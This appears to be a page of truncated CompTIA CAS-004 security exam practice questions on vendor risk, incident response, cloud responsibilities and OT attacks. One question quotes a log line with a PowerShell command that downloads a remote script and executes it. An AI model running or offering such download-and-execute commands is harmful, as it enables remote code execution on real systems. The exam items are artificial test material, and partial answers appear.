CAS-004 exam

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have...

A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very...

An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors . Which of the following categories BEST describes this type of vendor risk?A . SDLC...

An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access. Which of the following describes the administrator’s discovery?A . A vulnerabilityB . A threatC . A breachD . A riskView AnswerAnswer:...

The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified . Which of the following should the incident response team perform to understand the crash and prevent it in the future?A . Root...

A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system . Which of the following security responsibilities will the DevOps team need to perform?A . Securely configure the authentication mechanismsB . Patch the infrastructure at the operating systemC...

A security engineer is hardening a company’s multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open: 22 25 110 137 138 139 445 Internal Windows clients are used to transferring files to the server to stage them for customer download as part...

An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports. Which of the following historian server locations will allow the business to get the required reports in an and...

A company security engineer arrives at work to face the following scenario: 1) Website defacement 2) Calls from the company president indicating the website needs to be fixed Immediately because It Is damaging the brand 3) A Job offer from the company's competitor 4) A security analyst's investigative report, based...

An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems . Which of the following is the MOST likely security consequence of this attack?A . A turbine would overheat...